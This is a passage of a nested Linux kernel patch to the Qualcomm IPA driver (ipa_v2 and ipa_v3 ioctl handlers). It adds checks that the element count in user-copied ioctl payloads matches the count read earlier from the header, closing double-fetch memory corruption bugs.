- 		if (ipa2_add_flt_rule((struct ipa_ioc_add_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -837,10 +909,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_flt_rule *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_flt_rule) +
--		   ((struct ipa_ioc_del_flt_rule *)header)->num_hdls *
--		   sizeof(struct ipa_flt_rule_del);
-+		   pre_entry * sizeof(struct ipa_flt_rule_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -850,6 +923,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_flt_rule *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_flt_rule *)param)->
-+				num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_del_flt_rule((struct ipa_ioc_del_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -866,10 +949,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_mdfy_flt_rule) +
--		   ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_mdfy);
-+		   pre_entry * sizeof(struct ipa_flt_rule_mdfy);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -879,6 +963,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_mdfy_flt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_mdfy_flt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_mdfy_flt_rule((struct ipa_ioc_mdfy_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -992,9 +1086,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_tx_props *)
--				header)->num_tx_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_tx_props *)
-+			header)->num_tx_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_tx_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -1005,6 +1100,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_tx_props *)
-+			param)->num_tx_props
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_query_intf_tx_props *)
-+				param)->num_tx_props, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa_query_intf_tx_props(
- 				(struct ipa_ioc_query_intf_tx_props *)param)) {
- 			retval = -1;
-@@ -1027,9 +1132,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_rx_props *)
--				header)->num_rx_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_rx_props *)
-+			header)->num_rx_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_rx_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -1040,6 +1146,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_rx_props *)
-+			param)->num_rx_props != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_query_intf_rx_props *)
-+				param)->num_rx_props, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa_query_intf_rx_props(
- 				(struct ipa_ioc_query_intf_rx_props *)param)) {
- 			retval = -1;
-@@ -1062,9 +1177,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_ext_props *)
--				header)->num_ext_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_ext_props *)
-+			header)->num_ext_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_ext_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -1075,6 +1191,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_ext_props *)
-+			param)->num_ext_props != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_query_intf_ext_props *)
-+				param)->num_ext_props, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa_query_intf_ext_props(
- 				(struct ipa_ioc_query_intf_ext_props *)param)) {
- 			retval = -1;
-@@ -1091,8 +1216,10 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		pyld_sz = sizeof(struct ipa_msg_meta) +
-+		pre_entry =
- 		   ((struct ipa_msg_meta *)header)->msg_len;
-+		pyld_sz = sizeof(struct ipa_msg_meta) +
-+		   pre_entry;
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1102,6 +1229,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_msg_meta *)param)->msg_len
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_msg_meta *)param)->msg_len,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa_pull_msg((struct ipa_msg_meta *)param,
- 				 (char *)param + sizeof(struct ipa_msg_meta),
- 				 ((struct ipa_msg_meta *)param)->msg_len) !=
-@@ -1218,10 +1354,12 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_hdr_proc_ctx *)
-+			header)->num_proc_ctxs;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_hdr_proc_ctx) +
--		   ((struct ipa_ioc_add_hdr_proc_ctx *)header)->num_proc_ctxs *
--		   sizeof(struct ipa_hdr_proc_ctx_add);
-+		   pre_entry * sizeof(struct ipa_hdr_proc_ctx_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1231,6 +1369,15 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_hdr_proc_ctx *)
-+			param)->num_proc_ctxs != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_hdr_proc_ctx *)
-+				param)->num_proc_ctxs, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_add_hdr_proc_ctx(
- 			(struct ipa_ioc_add_hdr_proc_ctx *)param)) {
- 			retval = -EFAULT;
-@@ -1247,10 +1394,11 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_hdr_proc_ctx) +
--		   ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls *
--		   sizeof(struct ipa_hdr_proc_ctx_del);
-+		   pre_entry * sizeof(struct ipa_hdr_proc_ctx_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1260,6 +1408,16 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_hdr_proc_ctx *)
-+			param)->num_hdls != pre_entry)) {
-+			IPAERR(" prevent memory corruption( %d not match %d)\n",
-+				((struct ipa_ioc_del_hdr_proc_ctx *)param)->
-+				num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa2_del_hdr_proc_ctx(
- 			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
- 			retval = -EFAULT;
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-index 041b461..d7e98eb 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-@@ -592,6 +592,7 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 	struct ipa_ioc_v4_nat_del nat_del;
- 	struct ipa_ioc_rm_dependency rm_depend;
- 	size_t sz;
-+	int pre_entry;
- 
- 	IPADBG("cmd=%x nr=%d\n", cmd, _IOC_NR(cmd));
- 
-@@ -645,11 +646,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
-+		pre_entry =
-+			((struct ipa_ioc_nat_dma_cmd *)header)->entries;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_nat_dma_cmd) +
--		   ((struct ipa_ioc_nat_dma_cmd *)header)->entries *
--		   sizeof(struct ipa_ioc_nat_dma_one);
-+		   pre_entry * sizeof(struct ipa_ioc_nat_dma_one);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -660,7 +661,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_nat_dma_cmd *)param)->entries
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_nat_dma_cmd *)param)->entries,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_nat_dma_cmd((struct ipa_ioc_nat_dma_cmd *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -685,10 +694,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_hdr *)header)->num_hdrs;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_hdr) +
--		   ((struct ipa_ioc_add_hdr *)header)->num_hdrs *
--		   sizeof(struct ipa_hdr_add);
-+		   pre_entry * sizeof(struct ipa_hdr_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -698,6 +708,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_hdr *)param)->num_hdrs
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_hdr *)param)->num_hdrs,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_add_hdr((struct ipa_ioc_add_hdr *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -714,10 +733,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_hdr *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_hdr) +
--		   ((struct ipa_ioc_del_hdr *)header)->num_hdls *
--		   sizeof(struct ipa_hdr_del);
-+		   pre_entry * sizeof(struct ipa_hdr_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -727,6 +747,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_hdr *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_hdr *)param)->num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_del_hdr((struct ipa_ioc_del_hdr *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -743,10 +772,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_rt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_rt_rule) +
--		   ((struct ipa_ioc_add_rt_rule *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_add);
-+		   pre_entry * sizeof(struct ipa_rt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -756,6 +786,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_rt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_rt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_add_rt_rule((struct ipa_ioc_add_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -772,10 +812,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_rt_rule_after *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_rt_rule_after) +
--		   ((struct ipa_ioc_add_rt_rule_after *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_add);
-+		   pre_entry * sizeof(struct ipa_rt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -785,6 +826,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_rt_rule_after *)param)->
-+			num_rules != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_rt_rule_after *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_add_rt_rule_after(
- 			(struct ipa_ioc_add_rt_rule_after *)param)) {
- 
-@@ -803,10 +854,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_mdfy_rt_rule) +
--		   ((struct ipa_ioc_mdfy_rt_rule *)header)->num_rules *
--		   sizeof(struct ipa_rt_rule_mdfy);
-+		   pre_entry * sizeof(struct ipa_rt_rule_mdfy);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -816,6 +868,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_mdfy_rt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_mdfy_rt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_mdfy_rt_rule((struct ipa_ioc_mdfy_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -832,10 +894,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_rt_rule *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_rt_rule) +
--		   ((struct ipa_ioc_del_rt_rule *)header)->num_hdls *
--		   sizeof(struct ipa_rt_rule_del);
-+		   pre_entry * sizeof(struct ipa_rt_rule_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -845,6 +908,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_rt_rule *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_rt_rule *)param)->num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_del_rt_rule((struct ipa_ioc_del_rt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -861,10 +933,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_flt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_flt_rule) +
--		   ((struct ipa_ioc_add_flt_rule *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_add);
-+		   pre_entry * sizeof(struct ipa_flt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -874,6 +947,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_flt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_flt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_add_flt_rule((struct ipa_ioc_add_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -891,10 +974,12 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_flt_rule_after *)header)->
-+			num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_flt_rule_after) +
--		   ((struct ipa_ioc_add_flt_rule_after *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_add);
-+		   pre_entry * sizeof(struct ipa_flt_rule_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -904,6 +989,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_flt_rule_after *)param)->
-+			num_rules != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_flt_rule_after *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_add_flt_rule_after(
- 				(struct ipa_ioc_add_flt_rule_after *)param)) {
- 			retval = -EFAULT;
-@@ -921,10 +1016,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_flt_rule *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_flt_rule) +
--		   ((struct ipa_ioc_del_flt_rule *)header)->num_hdls *
--		   sizeof(struct ipa_flt_rule_del);
-+		   pre_entry * sizeof(struct ipa_flt_rule_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -934,6 +1030,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_flt_rule *)param)->num_hdls
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_flt_rule *)param)->
-+				num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_del_flt_rule((struct ipa_ioc_del_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -950,10 +1056,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_mdfy_flt_rule) +
--		   ((struct ipa_ioc_mdfy_flt_rule *)header)->num_rules *
--		   sizeof(struct ipa_flt_rule_mdfy);
-+		   pre_entry * sizeof(struct ipa_flt_rule_mdfy);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -963,6 +1070,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_mdfy_flt_rule *)param)->num_rules
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_mdfy_flt_rule *)param)->
-+				num_rules,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_mdfy_flt_rule((struct ipa_ioc_mdfy_flt_rule *)param)) {
- 			retval = -EFAULT;
- 			break;
-@@ -1076,9 +1193,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_tx_props *)
--				header)->num_tx_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_tx_props *)
-+			header)->num_tx_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_tx_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -1089,6 +1207,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_tx_props *)
-+			param)->num_tx_props
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_query_intf_tx_props *)
-+				param)->num_tx_props, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_query_intf_tx_props(
- 				(struct ipa_ioc_query_intf_tx_props *)param)) {
- 			retval = -1;
-@@ -1111,9 +1239,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_rx_props *)
--				header)->num_rx_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_rx_props *)
-+			header)->num_rx_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_rx_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -1124,6 +1253,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_rx_props *)
-+			param)->num_rx_props != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_query_intf_rx_props *)
-+				param)->num_rx_props, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_query_intf_rx_props(
- 				(struct ipa_ioc_query_intf_rx_props *)param)) {
- 			retval = -1;
-@@ -1146,9 +1284,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--
--		pyld_sz = sz + ((struct ipa_ioc_query_intf_ext_props *)
--				header)->num_ext_props *
-+		pre_entry =
-+			((struct ipa_ioc_query_intf_ext_props *)
-+			header)->num_ext_props;
-+		pyld_sz = sz + pre_entry *
- 			sizeof(struct ipa_ioc_ext_intf_prop);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
-@@ -1159,6 +1298,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_query_intf_ext_props *)
-+			param)->num_ext_props != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_query_intf_ext_props *)
-+				param)->num_ext_props, pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_query_intf_ext_props(
- 				(struct ipa_ioc_query_intf_ext_props *)param)) {
- 			retval = -1;
-@@ -1175,8 +1323,10 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		pyld_sz = sizeof(struct ipa_msg_meta) +
-+		pre_entry =
- 		   ((struct ipa_msg_meta *)header)->msg_len;
-+		pyld_sz = sizeof(struct ipa_msg_meta) +
-+		   pre_entry;
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1186,6 +1336,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_msg_meta *)param)->msg_len
-+			!= pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_msg_meta *)param)->msg_len,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_pull_msg((struct ipa_msg_meta *)param,
- 				 (char *)param + sizeof(struct ipa_msg_meta),
- 				 ((struct ipa_msg_meta *)param)->msg_len) !=
-@@ -1302,10 +1461,12 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_add_hdr_proc_ctx *)
-+			header)->num_proc_ctxs;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_add_hdr_proc_ctx) +
--		   ((struct ipa_ioc_add_hdr_proc_ctx *)header)->num_proc_ctxs *
--		   sizeof(struct ipa_hdr_proc_ctx_add);
-+		   pre_entry * sizeof(struct ipa_hdr_proc_ctx_add);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1315,6 +1476,15 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_add_hdr_proc_ctx *)
-+			param)->num_proc_ctxs != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_add_hdr_proc_ctx *)
-+				param)->num_proc_ctxs, pre_entry);
